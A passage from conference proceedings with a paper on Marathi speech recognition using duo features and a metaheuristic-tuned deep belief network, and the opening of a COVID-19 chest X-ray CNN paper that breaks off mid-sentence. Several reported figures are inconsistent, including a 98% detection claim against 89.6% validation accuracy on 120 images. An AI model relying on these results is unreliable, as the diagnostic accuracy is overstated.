cations Conference and Exposition OFC 2013 (pp. 18–20). https://doi.org/10.1364/ofc.2013.
ow1h.1.
38. Aladin, S., & Tremblay, C. (2018). Cognitive tool for estimating the QoT of new lightpaths.
In 2018 Optical Fiber Communications Conference and Exposition OFC 2018— Proceedings
(Vol. 3, pp. 1–3, 2018). https://doi.org/10.1364/ofc.2018.m3a.3.
39. Shahkarami, S., Musumeci, F., Cugini, F., & Tornatore, M. (2018). Machine-learning-based
soft-failure detection and identification in optical networks. In Optical InfoBase Conference
Papers (Vol. Part F84-O, pp. 37–39). https://doi.org/10.1364/OFC.2018.M3A.5.
Duo Features with
Hybrid-Meta-Heuristic-Deep Belief
Network Based Pattern Recognition for
Marathi Speech Recognition

Ravindra P. Bachate, Ashok Sharma, and Amar Singh

Abstract Marathi speech recognition is challenging due to the many dialects, vari-
ability in pronunciation, and the limited size of speech corpus available for developing
a speech recognition system. This work addresses the critical issues in developing
a speech recognition system for the Marathi Language. The paper evaluates various
approaches for feature extraction and pattern recognition and proposes optimized
methods for feature extraction and pattern recognition of the Marathi language.
Evaluation is classified into two parts—Feature Extraction Techniques and Pattern
Recognition Techniques. In feature extraction, MFCC and spectral features are eval-
uated, and their results are compared for analysis purposes using six measures. In
pattern recognition, DBN is optimized with different techniques such as WOA, GWO,
CBBO, and ROA and analyzed using six performance measure parameters. Finally,
the duo feature hybrid algorithm for feature extraction and new pattern recognition
approach RCBO-DBN has been proposed, and its performance is compared with
earlier techniques.

Keywords Deep belief network · Feature extraction · MFCC · Pattern


recognition · Spectral features

1 Introduction

The speech recognition system is an application of natural language processing. It is


gaining popularity and full acceptance due to the dramatic growth in technology and
its usage. The speech recognition systems can be developed using various approaches

R. P. Bachate (B) · A. Sharma


School of Computer Science and Engineering, Lovely Professional University, Phagwara,
Jalandhar, Punjab, India
A. Singh
School of Computer Application, Lovely Professional University, Phagwara, Jalandhar, Punjab,
India
e-mail: amar.23318@lpu.co.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 665
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_53

such as the traditional HMM-GMM approach, the deep learning approach, and hybrid
approaches. Each method has its own pros and cons in different circumstances. The
languages spoken by most people in the world benefit from the availability of
large speech corpora for building speech recognition systems. On the other hand,
languages that belong to a small geographical region or are spoken by a small group of
people relative to the world's population receive less attention for developing a
speech recognition system. More than 9.5 crore people in India speak the Marathi
language [1]. The Marathi language has a total of 42 dialects, spread mainly across
Maharashtra state and the rest of India. Little research has been done until
now on developing a speech recognition system for the Marathi language.
A deep belief network is a stack of restricted Boltzmann machines (RBMs), each consist-
ing of two layers, a visible layer and a hidden layer. Unlike deep
neural networks, each RBM layer learns from all of its input. The hidden layer of one
RBM becomes the visible layer of the next RBM. "An RBM is an undirected energy-
based model with two layers of visible (v) and hidden (h) units, respectively, with
connections only between layers. RBM has two biases—(a) Hidden layer biases that
are used for a forward pass and (b) Visible layer bias that is used for the backward
pass. Each RBM module is trained one at a time in an unsupervised manner and
using contrastive divergence procedure" [2]. RBM is suitable for many applications
such as regression, feature learning, dimensionality reduction, etc. The performance
of DBN depends on three parameters—(i) number of hidden units, (ii) number of
layers, and (iii) number of iterations [3]. The performance of DBN flattens after reach-
ing a threshold number of hidden units. If the number of hidden layers increases,
the performance of DBN is affected badly, but the performance of DBN can be
increased by increasing the training iterations of the RBMs. The total energy of an RBM
with hidden layer (h) and visible layer (v) is denoted in Eq. (1)


E(v, h) = −∑_i a_i v_i − ∑_j b_j h_j − ∑_{i,j} v_i w_{ij} h_j (1)

where a_i and b_j are the visible- and hidden-layer biases and w_{ij} are the weights connecting visible unit i to hidden unit j.
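To make the greedy, layer-wise training idea concrete, the following is a minimal sketch (not the implementation used in this work) of a small DBN-style stack built from scikit-learn's BernoulliRBM: each RBM is trained one at a time with contrastive divergence, the hidden activations of one RBM become the visible input of the next, and a simple supervised classifier sits on top. The data, layer sizes and hyperparameters are placeholders.

```python
# Minimal DBN-style sketch: two RBMs trained greedily, then a supervised classifier.
import numpy as np
from sklearn.neural_network import BernoulliRBM
from sklearn.linear_model import LogisticRegression

rng = np.random.RandomState(0)
X = rng.rand(500, 64)            # placeholder features scaled to [0, 1]
y = rng.randint(0, 10, 500)      # placeholder class labels

rbm1 = BernoulliRBM(n_components=128, learning_rate=0.05, n_iter=10, random_state=0)
rbm2 = BernoulliRBM(n_components=64,  learning_rate=0.05, n_iter=10, random_state=0)

h1 = rbm1.fit_transform(X)       # unsupervised contrastive-divergence training
h2 = rbm2.fit_transform(h1)      # hidden layer of rbm1 is the visible layer of rbm2

clf = LogisticRegression(max_iter=1000).fit(h2, y)   # supervised output stage
print("training accuracy:", clf.score(h2, y))
```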

This paper is organized as follows. Related work on existing speech recognition
methodologies is presented in Sect. 2. The duo features with hybrid-meta-heuristic-based
deep belief network are discussed in Sect. 3. The experimental setup, results and
performance analysis of various pattern recognition algorithms are presented in
Sect. 4. Finally, the conclusion and future scope of the paper are given in Sect. 5.

2 Related Work

Natural language processing and understanding play an essential role in transforming
technology at different levels. "Today's world is data-driven, and we must work on
techniques that will improve the living standard of the human being. If we want to
make their life better using NLP, we need to work on regional languages like Marathi,
Hindi, Punjabi, and so on" [4]. Supriya et al. [5] implemented a Marathi auto-
matic speech recognition system using HMM and DNN. The dataset used for this
implementation contains 15,000 speech files from 1500 different speakers. The proposed
system was implemented using the Kaldi ASR toolkit and achieved a 24% word error
rate. A text corpus of 340 sentences was also used. Five models—Mono, Tri1, Tri2,
Tri3, and SGMM—were used in the system for comparative study, and SGMM gave a
better result compared to the other models. Kishori et al. [6] proposed a Marathi ASR
system for isolated words using a neural network. The speech corpus used for the
implementation consists of 100 words from 100 different speakers with three utterances
of each word. The discrete wavelet transform (DWT) algorithm was used for feature
extraction. For pattern recognition, an artificial neural network (ANN) was used, which
gave 60% accuracy. Lokesh et al. [7] proposed a bi-directional recurrent neural net-
work (BRNN) for building a Tamil automatic speech recognition system. The SGF
algorithm was used for speech data pre-processing, feature extraction was implemented
using MAR and PLP algorithms, and the BRNN was used as the classifier. Different
classification algorithms such as BRNN-SOM, RNN, and DNN-HMM were implemented
and analyzed for performance measurement. The proposed system achieved 93.6%
accuracy, which is better compared to the other classifiers. Sangramsingh [8]
implemented Marathi speech recognition using the HTK toolkit. Here, MFCC was
used for feature extraction and HMM for classification. With this, a word error rate
of 5.37% and an accuracy of 94.63% were achieved. The dataset used for the
implementation was minimal, i.e., 30 words and eight different speakers.
Puneet et al. [9] developed a Punjabi ASR system for mobile phones. The MFCC
algorithm was used for feature extraction, and GMM was used as the pattern recogni-
tion technique. A 6.34-hour speech corpus with 48 distinct speakers was used; this
speech corpus contains 1275 words. The system gives the highest accuracy for a
higher number of GMM components, i.e., 64, and the GMM-CD Untied model gave
the highest accuracy of 81.2%. Ravindra and Ashok [10] discussed various approaches
used for pattern recognition. In this paper, the performance of different classifiers for
building a speech recognition system is discussed, such as KNN, SVM, NN, DNN, and
DBN. After implementing and analyzing the results of these algorithms, it was found
that DBN gives better results compared to the other classifier algorithms.

3 Duo Features with Hybrid-Meta-Heuristic-Based Deep


Belief Network

3.1 Optimization Techniques Used for Deep Belief Network

3.1.1 Grey Wolf Optimizer

The Grey Wolf Optimizer (GWO) algorithm was proposed by Mirjalili et al. in 2014 [11].
The design of this algorithm is based on a natural scenario, i.e., survival of the
fittest. Organisms in nature evolve through heredity, selection, and mutation, and the
searching process of the wolves changes accordingly. There are four phases of wolf
hunting: (i) searching for prey, (ii) encircling prey, (iii) hunting, and (iv) attacking
the target [12]. "After each iteration of the algorithm sort the fitness value that
corresponds to each wolf by ascending order, and then eliminate R wolves with worst
fitness value, meanwhile randomly generate wolves equal to the number of eliminated
wolves".
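As a concrete reference for the search mechanics, the sketch below implements the standard GWO position update on a toy objective, in which the three best wolves (alpha, beta and delta) guide the remaining pack; it is a generic illustration of the optimizer, not the specific variant with wolf elimination quoted above.

```python
# Standard Grey Wolf Optimizer sketch on a toy objective (sphere function).
import numpy as np

def gwo(objective, dim=5, n_wolves=20, n_iter=100, lb=-10.0, ub=10.0, seed=0):
    rng = np.random.default_rng(seed)
    wolves = rng.uniform(lb, ub, size=(n_wolves, dim))
    for t in range(n_iter):
        fitness = np.array([objective(w) for w in wolves])
        alpha, beta, delta = wolves[np.argsort(fitness)[:3]]   # three best wolves
        a = 2 - 2 * t / n_iter                                 # decreases from 2 to 0
        for i in range(n_wolves):
            new_pos = np.zeros(dim)
            for leader in (alpha, beta, delta):
                r1, r2 = rng.random(dim), rng.random(dim)
                A, C = 2 * a * r1 - a, 2 * r2
                D = np.abs(C * leader - wolves[i])             # encircling distance
                new_pos += (leader - A * D) / 3.0              # average of the guides
            wolves[i] = np.clip(new_pos, lb, ub)
    best = min(wolves, key=objective)
    return best, objective(best)

best_pos, best_val = gwo(lambda x: float(np.sum(x ** 2)))      # sphere test function
print("best objective value:", best_val)
```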

3.1.2 Whale Optimization Algorithm

The inspiration for the Whale Optimization Algorithm (WOA) is taken from the whale,
the biggest mammal in the world. There are seven different whale species, of which the
humpback is considered here for designing the algorithm. The unique bubble-net
feeding behavior, which is observed only in humpback whales, is used to develop the
algorithm [12]. This algorithm involves three phases—(i) encircling prey, (ii)
bubble-net attacking, and (iii) searching for prey. "WOA is a simple, robust, and
swarm-based stochastic optimization algorithm. Population-based WOA can avoid local
optima and get a globally optimal solution" [13].

3.1.3 Chaotic Biogeography Based Optimization

The Chaotic Biogeography-Based Optimization (CBBO) algorithm is inspired by
biogeography. "The BBO algorithm mimics relationships between different species
(habitants) located in different habitats in terms of immigration, emigration, and
mutation" [14]. The habitat suitability index (HSI) of each habitat is calculated to
determine the survival of that habitat in its biogeographical location. A high index
indicates high suitability for inhabitants, and more species can reside there,
whereas a low index indicates low suitability, and fewer species can survive in that
habitat.

3.1.4 Rider Optimization Algorithm

The Rider Optimization Algorithm (ROA) is inspired by a group of riders who want to
reach a target location and become the winner [15]. There are four types of
riders—(i) bypass rider, (ii) follower, (iii) overtaker, and (iv) attacker. Each rider
has its own nature and strategy to reach the destination. The bypass rider skips the
leading path to reach the destination; in simple words, it does not follow the leading
rider and chooses its own path. The follower group of riders follows the leading rider.
The overtaker rider follows its own path with respect to the leading rider to reach the
destination. The attacker rider is a type of rider that uses maximum speed to reach the
target location. The ROA algorithm is used for obtaining the optimal weights in the
neural network.

3.2 Proposed Architecture

The proposed duo features with hybrid-meta-heuristic-based deep belief network is
divided into three parts—speech corpus pre-processing by implementing a smoothing
technique, feature extraction using the duo features, which is a newly proposed feature
extraction methodology, and classification, which has been implemented with the newly
proposed hybrid algorithm RCBO-DBN. The proposed model is shown in Fig. 1.

3.3 Duo-Feature Feature Extraction Technique

The feature extraction phase plays a vital role in the speech recognition system
because the performance of the classifier depends on the accuracy and quality of the
features extracted from the speech signals, which form the input to the classifier.

Fig. 1 Proposed duo features with hybrid-meta-heuristic-based deep belief network

The original speech corpus is divided into two parts—a training speech corpus (80%)
and a testing speech corpus (20%). It is then passed to three feature extraction
algorithms—(a) MFCC, (b) spectral features, and (c) the duo-feature extraction
algorithm (MFCC + spectral features). The extracted features are then passed to the
DBN classifier, and the results are compared. The proposed duo-feature is a
combination of 14 MFCC features and 26 spectral features, which helps to improve the
accuracy and quality of the features used for classification.
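A hedged sketch of how such a duo-feature vector could be assembled with librosa is shown below; since the exact 26 spectral descriptors used in this work are not listed here, the spectral features in the sketch (centroid, bandwidth, rolloff, contrast, flatness and zero-crossing rate) are illustrative stand-ins, and the file path is hypothetical.

```python
# Illustrative duo-feature extraction: 14 MFCCs + a set of spectral descriptors
# (the authors' exact 26 spectral features are not listed, so these are stand-ins).
import numpy as np
import librosa

def duo_features(wav_path, sr=16000):
    y, sr = librosa.load(wav_path, sr=sr)
    mfcc = librosa.feature.mfcc(y=y, sr=sr, n_mfcc=14)           # 14 MFCC features
    spectral = np.vstack([
        librosa.feature.spectral_centroid(y=y, sr=sr),
        librosa.feature.spectral_bandwidth(y=y, sr=sr),
        librosa.feature.spectral_rolloff(y=y, sr=sr),
        librosa.feature.spectral_contrast(y=y, sr=sr),           # 7 contrast bands
        librosa.feature.spectral_flatness(y=y),
        librosa.feature.zero_crossing_rate(y),
    ])
    # Average over time frames and concatenate into one feature vector per utterance
    return np.concatenate([mfcc.mean(axis=1), spectral.mean(axis=1)])

# feature_vector = duo_features("marathi_utterance.wav")   # hypothetical file path
```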

3.4 RCBO-DBN Pattern Recognition

The proposed RCBO is a combination of the Rider Optimization Algorithm (ROA)
and the Chaotic Biogeography-Based Optimization (CBBO) algorithm. Each of these two
algorithms is good in one aspect when working with the neural network. The ROA
algorithm is best suited for obtaining the optimal weights for the hidden and
visible neurons. On the other hand, CBBO is best suited for classification based
on the habitat suitability index (HSI). So, for developing the proposed optimization
algorithm RCBO for the deep belief network, the strength of each algorithm is considered
and used at the appropriate place.
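The precise coupling of ROA and CBBO is specific to the proposed RCBO, but the general interface between any such optimizer and the DBN can be illustrated: each candidate solution produced by the optimizer is decoded into DBN parameters, and the validation accuracy obtained with those parameters serves as the fitness value to be maximized. The sketch below is an assumption-laden illustration of that interface, not the authors' RCBO code.

```python
# Illustration only: decode an optimizer's candidate into DBN hyperparameters and
# use validation accuracy as the fitness to be maximized (not the authors' code).
from sklearn.neural_network import BernoulliRBM
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

def dbn_fitness(candidate, X, y):
    n_hidden = int(candidate[0])     # e.g. 32..512 hidden units (assumed encoding)
    lr = float(candidate[1])         # e.g. 0.001..0.1 learning rate (assumed encoding)
    X_tr, X_va, y_tr, y_va = train_test_split(X, y, test_size=0.2, random_state=0)
    rbm = BernoulliRBM(n_components=n_hidden, learning_rate=lr, n_iter=10,
                       random_state=0)
    h_tr, h_va = rbm.fit_transform(X_tr), rbm.transform(X_va)
    clf = LogisticRegression(max_iter=1000).fit(h_tr, y_tr)
    return clf.score(h_va, y_va)     # fitness = validation accuracy
```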

4 Results and Discussion

4.1 Experimental Setup

The evaluation of different feature extraction and pattern recognition approaches
for Marathi speech recognition was implemented using Python. The Marathi speech
corpus used for the experimentation was taken from the Indian Language Technology
Proliferation and Development Center, Government of India. The speech corpus
contains around 44,500 speech files with their pronunciations. The total speech corpus
is divided into six parts for easy computation. The batch size used for training
was 32, and the number of RBM epochs was 10. The performance of the proposed
algorithms was compared with conventional algorithms such as MFCC, spectral features,
WOA, GWO, ROA, and CBBO. The analysis considered performance measures such as
accuracy, NPV, precision, FPR, FNR, and FDR.
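For reference, the standard confusion-matrix definitions of these measures, which are reported in Tables 1 and 2, can be computed as in the short generic sketch below (it is not the authors' evaluation code).

```python
# Standard confusion-matrix definitions of the reported measures (generic sketch).
def report(tp, tn, fp, fn):
    return {
        "accuracy":  (tp + tn) / (tp + tn + fp + fn),
        "precision": tp / (tp + fp),      # positive predictive value
        "NPV":       tn / (tn + fn),      # negative predictive value
        "FPR":       fp / (fp + tn),      # false positive rate
        "FNR":       fn / (fn + tp),      # false negative rate
        "FDR":       fp / (fp + tp),      # false discovery rate
    }

print(report(tp=80, tn=90, fp=10, fn=20))  # example counts
```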

Table 1 Performance analysis of feature extraction techniques

Algorithms          Accuracy   Precision   NPV     FPR     FNR    FDR
MFCC                70.94      6.35        70.37   29.62   1.54   93.65
Spectral features   69.06      5.94        68.48   31.51   2.43   94.06
Proposed            83.12      10.51       82.79   17.21   0.97   89.49

4.2 Performance Analysis of Feature Extraction Techniques

The performance analysis of the proposed MFCC-spectral (duo) features and the
conventional MFCC and spectral feature extraction techniques is shown in Table 1.
The proposed duo-feature gives an improvement in accuracy of around 12% over MFCC
and around 13% over spectral features at an 85% learning percentage. In terms of
precision, the proposed duo-feature gives an improvement of around 4% over MFCC and
5% over spectral features. Another positive measure used here for performance
analysis is NPV; the NPV of the proposed feature extraction technique is higher than
that of MFCC and spectral features by around 12% and 14%, respectively. The first
negative measure considered here is the FPR; the FPR values for all techniques are
given in Table 1. Another negative measure considered here is the FNR, which shows
a betterment of around 0.5% over MFCC and 1.5% over spectral features. The last
negative measure used for performance analysis is FDR; the FDR of the proposed
technique is lower than that of MFCC and spectral features by around 4% and 4.5%,
respectively.

4.3 Performance Analysis of Pattern Recognition Techniques

The results of the various optimized DBNs and the proposed RCBO-DBN are given in
Table 2. The first positive measure used for analysis is accuracy. The proposed
algorithm gives an accuracy of 71.5%, which is 2.11% higher than GWO-DBN, 8.84%
higher than WOA-DBN, 8.46% higher than CBBO-DBN, and 9.82% higher than ROA-DBN.
The precision of the proposed optimized DBN is 0.22% higher than GWO-DBN, 1.22%
higher than WOA-DBN, 1.1% higher than CBBO-DBN, and 1.28% higher than ROA-DBN.
The negative predictive value (NPV) is another positive measure used for performance
analysis; RCBO-DBN performs well compared to the conventional optimized algorithms,
with an improvement of 0.41% over GWO-DBN, 7.27% over WOA-DBN, 6.91% over
CBBO-DBN, and 8.29% over ROA-DBN. The first negative measure considered here is
the FPR, whose values are given in Table 2; the proposed approach gives a betterment
of around 0.41% over GWO-DBN, 7.27% over WOA-DBN, 6.91% over CBBO-DBN, and 8.29%
over ROA-DBN. Another negative measure used for performance analysis is FNR. The FNR
results of the proposed technique are given in Table 2 and are good with respect to
the other conventional optimized algorithms, with an improvement of 2.43% over
GWO-DBN, 2.02% over WOA-DBN, 0.54% over CBBO-DBN, and 0.81% over ROA-DBN. The last
negative measure used for performance analysis is FDR, for which the proposed
approach provides an improvement of 0.97% over GWO-DBN, 2.36% over WOA-DBN, 0.54%
over CBBO-DBN, and 1.69% over ROA-DBN.

Table 2 Performance analysis of pattern recognition techniques

Algorithms   Accuracy   Precision   NPV     FPR     FNR    FDR
GWO-DBN      69.39      5.95        68.82   31.17   3.24   93.65
WOA-DBN      62.66      4.95        61.96   38.03   2.83   95.04
CBBO-DBN     63.04      5.07        62.32   37.68   1.35   93.22
ROA-DBN      61.68      4.889       60.94   39.05   1.62   94.37
RCBO-DBN     71.50      6.17        69.23   30.76   0.81   92.68

5 Conclusion

This paper has proposed a novel approach to feature extraction and pattern recognition
for a Marathi speech recognition system. For the experiments, related work in the speech
domain was studied for Marathi as well as other Indic and non-Indic languages.
Here, the optimal features were selected by using the proposed duo-feature feature
extraction technique. After performance analysis, it was observed that the duo-feature
performs better, with an advantage of 12.7% over MFCC and 13% over spectral
features. Pattern recognition was carried out with the proposed RCBO-DBN and
other conventional optimized DBN techniques. The proposed optimization technique
gives an advantage of 2.11% over GWO-DBN, 8.84% over WOA-DBN, 8.46% over
CBBO-DBN, and 9.82% over ROA-DBN. Future work will focus on implementing
RNN and LSTM and comparing their results with the proposed RCBO-DBN.

References

1. Eberhard, D. M., Simons, G. F., & Fennig, C. D. (Eds.). Ethnologue: Languages of the World. SIL
International. [Online]. Available: https://www.ethnologue.com/language/mar.
2. Morabito, F. C., Campolo, M., Ieracitano, C., & Mammone, N. (2018). Deep learning
approaches to electrophysiological multivariate time-series analysis. Elsevier Inc.

3. Salama, M. A., Hassanien, A. E., & Fahmy, A. A. (2011). Deep belief network for clustering and
classification of a continuous data. In 10th IEEE International Symposium on Signal Processing
and Information Technology, p. 24.
4. Bachate, R. P. & Sharma, A. (2020). Acquaintance with natural language processing for building
smart society. In E3S Web Conference, 170, 02006.
5. Paulose, S. Nath, S. & Samudravijaya, K. (2018). Marathi speech recognition. In The 6th
International Workshop on Spoken Language Technologies for Under-Resourced Languages
29-31 August 2018 (Vol. August, pp. 235–238). Gurugram, India .
6. Ghule, K. R., & Deshmukh, R. R. (2015). Automatic speech recognition of marathi isolated
words using neural network, 6(5), 4296–4298.
7. Lokesh, S., Malarvizhi Kumar, P., Ramya Devi, M., Parthasarathy, P., & Gokulnath, C. (2019).
An automatic tamil speech recognition system by using bidirectional recurrent neural network
with self-organizing map. Neural Computing and Applications, 31(5), 1521–1531.
8. Sangramsing, K. (2015, December). Marathi speech recognition system using hidden markov
model toolkit. Concurrent Engineering Research and Applications, 5(12).
9. Mittal, P., & Singh, N. (2019). Development and analysis of Punjabi ASR system for mobile
phones under different acoustic models. International Journal of Speech Technology, 22(1),
219–230.
10. Bachate, R. P., & Sharma, A. (2020). Comparing different pattern recognition approaches of
building Marathi ASR system. International Journal of Advanced Science and Technology,
29(5), 4615–4623.
11. Pradhan, M., Roy, P. K., & Pal, T. (2018). Oppositional based grey wolf optimization algorithm
for economic dispatch problem of power system. Ain Shams Engineering Journal, 9(4), 2015–
2025.
12. Mirjalili, S., & Lewis, A. (2016). The whale optimization algorithm. Advances in Engineering
Software, 95, 51–67.
13. Nasiri, J., & Khiyabani, F. M. (2018). A whale optimization algorithm (WOA) approach for
clustering. Cogent Mathematics and Statistics, 5(1), 1–13.
14. Saremi, S., Mirjalili, S., & Lewis, A. (2014). Biogeography-based optimization with chaos.
Neural Computing and Applications, 25(5), 1077–1097.
15. Binu, D., & Kariyappa, B. S. (2019). RideNN: A new rider optimization algorithm-based
neural network for fault diagnosis in analog circuits. IEEE Transactions on Instrumentation
and Measurement, 68(1), 2–26.
Computer-Aided Diagnostic
of COVID-19 Using Chest X-Ray
Analysis

Mangala Shetty and Spoorthi Shetty

Abstract Coronavirus disease 2019 (COVID-19) is highly contagious. The chest X-
ray (CXR) became the first clinical tool to examine COVID-19 infection. The
progression of the coronavirus pandemic has made the entire medical world
rely upon CXR because of its ubiquity and the reduced difficulty of detecting
diseases with it. Most chest diseases are curable if observed in the early
stages. CXR examination is a time-consuming medical procedure that relies on the
practitioner's level of experience. In some instances, medical professionals miss
the illness in the first CXR tests, and the disease symptoms may be identified only
during re-examination. In this paper, a classification task is carried out with
CXR images as input, and the classification results are declared as COVID-19 positive
or COVID-19 negative using a deep learning approach.
Keywords Chest X-ray (CXR) · Coronavirus disease · COVID-19 · Deep


learning · Computer-aided diagnostic (CAD)

1 Introduction

COVID-19 is an infectious disease that has spread to more than 210 countries, claimed
many lives, and become a pandemic. The COVID-19 pandemic has taken a
massive toll on people all over the globe. The risk of pneumonia suffered by patients
with COVID-19 is immense, especially for age groups above sixty and for people
suffering from other diseases. Coronaviruses are important pathogens of humans and
animals. At present, the novel COVID-19 is growing at an alarming rate all over the
world and poses a threat to the survival of billions of humans. While chest CT is said
to be a successful imaging procedure for the diagnosis of lung-related illness, chest
M. Shetty (B) · S. Shetty


Department of MCA, NMAM Institute of Technology, Nitte, Karkala, India
e-mail: mangalapshetty@nitte.edu.in
S. Shetty
e-mail: sshetty.07@nitte.edu.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 675
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_54

X-ray is more commonly used due to its shorter imaging time and significantly lower
cost than CT. Deep learning, one of the most common AI methods, provides an excellent
set of tools and algorithms to improve human life. Detection of disorders through
X-ray images is a problem that needs a better solution. In fact, the number of CXRs
to be investigated is vast, and well beyond the capacity of the available medical staff,
particularly in developing countries. A computer-aided diagnostic (CAD) program can
mark prospective areas on a CXR for doctors to inspect closely and can raise an alert
in situations where immediate treatment is required. One of the main tasks in
developing CAD functionality is to detect and identify disease from CXRs automatically;
helping radiologists to examine the massive quantities of X-ray images would be
crucial to successful and accurate COVID-19 examination. The key aim of the proposed
experiment is to increase the efficiency and performance of radiologists by developing
a computational framework for the identification and classification of COVID-19
disease. Our studies were centered on a collection of chest X-ray images
(metadata.csv) collected by Dr Joseph Cohen, a postdoctoral fellow at the University
of Montreal [1]. Experimental findings indicate that the system built here can
accurately detect 98.00% of COVID-19 cases.

2 Survey of Literature

A technique was implemented to reduce false positives by discovering the similarity
between the right and left lungs, and we implemented our segmentation algorithm based
on the active shape model algorithm. Deep learning can be applied in a diverse range
of fields, such as the identification of tumors and lesions in biological images [2, 3].
Computer-aided methods are extensively used in automated analysis of health-related
data [4–6]. Determining multifocal air-space disease on CXR could be a relevant sign
of COVID-19 pneumonia [7]. For several applications, the accuracy of automated
detection and diagnostic systems based on machine learning (ML) has been proven to
be competitive with that of a skilled and professional radiologist; ML has thus become
an efficient way to automate medical data processing and evaluation, especially of
CXRs [8]. ML has therefore led toward the growth of CAD. In addition, deep learning
has been researched and proven to be the most effective ML model for biomedical
image analysis [3, 9–11].
Our contribution: the method presented in this work has two distinct innovations
which distinguish it from previous work:

1. We present a diagnosis method based on finding the underlying structure of the
chest. Given the anatomical structure presented in a radiograph, we are able
to better simulate the decision process employed by the doctors, allowing for
better classification results.
2. Our method is based on supervised machine learning; the labels can be adapted
to match the requested pathology. The feature extraction will assign greater
weights to pixels which best distinguish the labels.

3 Proposed System

We constructed a system with highly reliable accuracy for detecting and classifying
digital chest X-rays of suspected coronavirus patients. The proposed method initially
converts the chest X-ray images into a smaller size compared to the source. The
architecture diagram of the proposed method is shown in Fig. 3. In Fig. 1, normal
chest X-rays are shown, and in Fig. 2, chest X-rays of COVID-19 affected patients are
shown. In the second step, images are characterized and categorized by the
convolutional neural network system, which selects the image characteristics and
categorizes the images. Because of the strength of the trained CNN configuration in
distinguishing normal and COVID-19 affected chest X-rays, our system's validation
precision was dramatically better relative to other methods. To validate the model's
accuracy, we replicated the model's training cycle many times, and the same findings
were noticed each time. In this experiment, exhaustive studies and evaluation measures
are carried out in order to check the efficacy of the new methodology.
From Dr Joseph Cohen's dataset, all the rows labelled COVID-19 are selected, ignoring
MERS, SARS, and ARDS. To develop and train the convolutional neural network
model, the Keras open-source deep learning platform with a TensorFlow backend [8] is
configured. The main dataset includes three categories of data (training, testing,
and validation) and two subcategories containing COVID-19 positive samples and
COVID-19 negative samples, the latter collected from the Kaggle chest X-ray database
of healthy persons. Thus, one hundred and twenty images in the dataset are ready for
the experiment. Chest X-ray images were carefully selected from patients between the
ages of 25 and 87. In accordance with the data ratio for training and validation, the
original data category was changed.

Fig. 1 Normal chest X-ray images

Fig. 2 COVID-19 affected chest X-ray images

Fig. 3 Proposed architecture
We just reorganized all of the data into training and validation collections. The
training set was assigned 80% of the images, and the test set was given 20% of the
images, to boost evaluation accuracy. We used several data augmentation methods to
artificially increase the dataset size; this helps solve overfitting issues and
increases the ability of the system to generalize during training. The framework
given in Fig. 3 is composed of the combined classification, convolution, and
max-pooling layers. The feature extractors include conv 3 × 3, 32; conv 3 × 3, 64;
conv 3 × 3, 128; conv 3 × 3, 128; a max-pooling layer of size 2 × 2; and a ReLU
activation between them. The outputs of the convolution and max-pooling operations
are organized into 2D planes named feature maps. With an input image of size
224 × 224 × 3, we obtained feature maps of sizes 208 × 208 × 32, 102 × 102 × 64,
49 × 49 × 128, and 22 × 22 × 128 for the convolution operations, and 104 × 104 × 32,
51 × 51 × 64, 24 × 24 × 128 and 11 × 11 × 128 through the pooling operations,
respectively. It is worth noting that every plane of a level in the network was
obtained by combining one or several planes of the previous level. The classifier is
located toward the far end of the proposed convolutional neural network (CNN). It is
essentially an artificial neural network (ANN) and is also called a dense layer. This
classifier uses specific feature vectors, like any other classifier, to conduct
classification. So, the features extracted by the CNN part are transformed into a
one-dimensional feature vector for the classifier. This step is termed flattening, in
which the result obtained from the convolution stage is flattened to produce one long
feature vector for use in the final classification by the dense layers. The main
components of the classification stage are a dropout of size 0.5, two dense layers, a
flattened layer, a ReLU between the two dense layers, and a sigmoid activation which
performs the classification.
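A hedged Keras sketch consistent with the layer sequence described above is given below; the width of the first dense layer, the optimizer, the batch size and the augmentation settings are assumptions (they are not stated in the text), and the directory paths are hypothetical.

```python
# CNN sketch matching the described layer sequence (dense width, optimizer and
# augmentation settings are assumptions; directory paths are hypothetical).
from tensorflow.keras import layers, models
from tensorflow.keras.preprocessing.image import ImageDataGenerator

model = models.Sequential([
    layers.Conv2D(32, (3, 3), activation="relu", input_shape=(224, 224, 3)),
    layers.MaxPooling2D((2, 2)),
    layers.Conv2D(64, (3, 3), activation="relu"),
    layers.MaxPooling2D((2, 2)),
    layers.Conv2D(128, (3, 3), activation="relu"),
    layers.MaxPooling2D((2, 2)),
    layers.Conv2D(128, (3, 3), activation="relu"),
    layers.MaxPooling2D((2, 2)),
    layers.Flatten(),
    layers.Dropout(0.5),
    layers.Dense(128, activation="relu"),      # width assumed
    layers.Dense(1, activation="sigmoid"),     # COVID-19 positive vs negative
])
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])

# 80/20 split with simple augmentation on the training images (settings assumed)
train_gen = ImageDataGenerator(rescale=1.0 / 255, rotation_range=10,
                               zoom_range=0.1, horizontal_flip=True)
val_gen = ImageDataGenerator(rescale=1.0 / 255)
# train_data = train_gen.flow_from_directory("data/train", target_size=(224, 224),
#                                            batch_size=16, class_mode="binary")
# val_data = val_gen.flow_from_directory("data/val", target_size=(224, 224),
#                                        batch_size=16, class_mode="binary")
# model.fit(train_data, validation_data=val_data, epochs=20)
```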

4 Results and Discussion

To determine and confirm the feasibility of the recommended method, we performed the
tests 10 times per hour, continuously, three times. Parameters and hyperparameters
were extensively tuned to improve system efficiency. Several findings were extracted,
but only the most credible findings from this analysis are reported. The final results
obtained are a training loss of 0.1191, a training accuracy of 0.9642, a validation
loss of 0.2325, and a validation accuracy of 0.8964. For training, CNN systems often
need images of fixed sizes. To illustrate our system's validation accuracy over
different input sizes, the X-ray images were resized to 100 × 100 × 3, 150 × 150 × 3,
224 × 224 × 3, 250 × 250 × 3 and 300 × 300 × 3. Figure 4 and Table 1 depict the
average output achieved after 3 hours of training.
As the size of the transformed images increases, validation precision decreases;
conversely, a smaller set of training images leads to only a marginal change in
validation precision. Consequently, the small glitches in the validation accuracy do
not indicate a significant effect on the final classification results of the proposed
system. Larger images often needed more training time and processing cost, and the
results for the 150 × 150 × 3 and 100 × 100 × 3 image sizes were identical. The
